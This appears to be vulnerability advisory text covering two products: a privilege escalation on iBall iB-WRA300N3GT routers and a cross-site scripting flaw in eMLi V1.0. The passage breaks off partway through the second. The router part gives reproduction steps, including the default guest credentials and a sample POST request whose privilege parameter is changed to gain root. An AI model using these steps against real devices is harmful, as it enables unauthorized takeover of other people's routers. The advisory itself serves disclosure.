Privilege Escalation on iBall iB-WRA300N3GT (Routers) devices allows remote authenticated users to obtain root privileges by leveraging a guest/user/normal account to submit a modified privilege parameter. Reproduction Steps: Step 1 : Logon to Router using Guest privileges. (Default : Username : guest , Password : guest) Step 2 : Goto Maintenance Tab Step 3 : Click on Password Tab (On Right Panel) Step 4 : Enter new user name and password for adding new guest user Step 5 : Intercept HTTP request Step 6 : A sample HTTP request will look like following one. ====================HTTP Request Sample======================= POST /form2userconfig.cgi HTTP/1.1 Referer: http://192.168.1.1/userconfig. htm?v=1499683514000 Cookie: SessionID= username=test&privilege=0&newp ass=hello&confpass=hello&addus er=Add&hiddenpass=&submit.htm% 3Fuserconfig.htm=Send Step 7 : Change privilege parameter from 0 to 2 and forward the HTTP request
Cross Site Scripting Vuulnerability in core-eMLi in eMLi V1.0 allows an Attacker to send malicious code, generally in the form of a browser-side script, to a different end user. What is Cross Site Scripting ? Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Impact Scenario : 1. Account Hijacking 2. Website Defacement 3. Stealing Credentials 4. Sensitive Data Leak Affected Versions : eMLi : School Management - 1.0 eMLi : College Ca